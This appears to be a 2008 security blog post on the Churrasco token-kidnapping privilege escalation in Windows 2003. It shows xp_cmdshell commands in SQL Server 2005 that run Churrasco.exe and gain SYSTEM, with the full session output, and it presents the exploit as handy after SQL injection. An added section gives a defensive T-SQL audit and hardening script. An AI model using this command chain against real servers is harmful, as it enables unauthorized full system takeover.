Windows 2003 Token Kidnapping Privilege Escalation

October 18, 2008

In case you haven't seen this exploit on milw0rm, it's worth having a look. It will be very handy, particularly in the following two instances:

1. SQL injection in SQL Server 2005, with the backend server running as 'SA'.
2. File upload functionality allowing you to run code.

It's worth noting that SQL Server 2005 runs as 'network service', so even with the 'sa' account and xp_cmdshell enabled, OS access is only gained as the restricted 'network service' user. The following session might help in understanding this better:

1> exec master..xp_cmdshell 'whoami'
2> go
---- --------------------------------
nt authority\network service

1> exec master..xp_cmdshell 'C:\test\Churrasco.exe whoami'
2> go
---- --------------------------------
/churrasco/-->Current User: NETWORK SERVICE
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 732
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 736
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 740
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 748
/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0x72c
/churrasco/-->Getting SYSTEM token from Rpcss Service...
/churrasco/-->Found SYSTEM token 0x724
/churrasco/-->Running command with SYSTEM Token...
/churrasco/-->Done, command should have ran as SYSTEM!
nt authority\system
(16 rows affected)
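As a defender-side companion to the session above, added here and not part of the original post, the following T-SQL audits the three preconditions it relies on (which account the service runs as, whether xp_cmdshell is enabled, and which logins hold sysadmin) and then disables xp_cmdshell. It assumes a default instance, whose service key is MSSQLSERVER; a named instance lives under MSSQL$<name>.

```sql
-- Added audit/hardening script (not part of the original post).
-- Assumes a default instance: the registry key below is MSSQLSERVER.

-- 1. Which account does the SQL Server service run as? SQL Server 2005 has no
--    DMV for this, so read the service's ObjectName from the registry.
EXEC master.dbo.xp_regread
    N'HKEY_LOCAL_MACHINE',
    N'SYSTEM\CurrentControlSet\Services\MSSQLSERVER',
    N'ObjectName';   -- e.g. NT AUTHORITY\NetworkService or LocalSystem

-- 2. Is xp_cmdshell enabled? value_in_use = 1 means any sysadmin login can
--    run OS commands in the service account's security context.
SELECT name, CAST(value_in_use AS int) AS value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';

-- 3. Which logins hold sysadmin? An application login should not appear
--    here; an injectable app connecting as one of them is the scenario above.
SELECT sp.name, sp.type_desc, sp.is_disabled
FROM sys.server_principals AS sp
WHERE IS_SRVROLEMEMBER('sysadmin', sp.name) = 1;

-- 4. Hardening: turn xp_cmdshell off. 'show advanced options' must be on
--    for sp_configure to address the option; switch it back off afterwards.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 5. Verify the change took effect (expect value_in_use = 0).
SELECT name, CAST(value_in_use AS int) AS value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';
```

Disabling xp_cmdshell and dropping application logins from sysadmin removes the command-execution step the post chains from; the token handling that lets NETWORK SERVICE reach SYSTEM lives in Windows itself and is addressed only by patching the OS.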
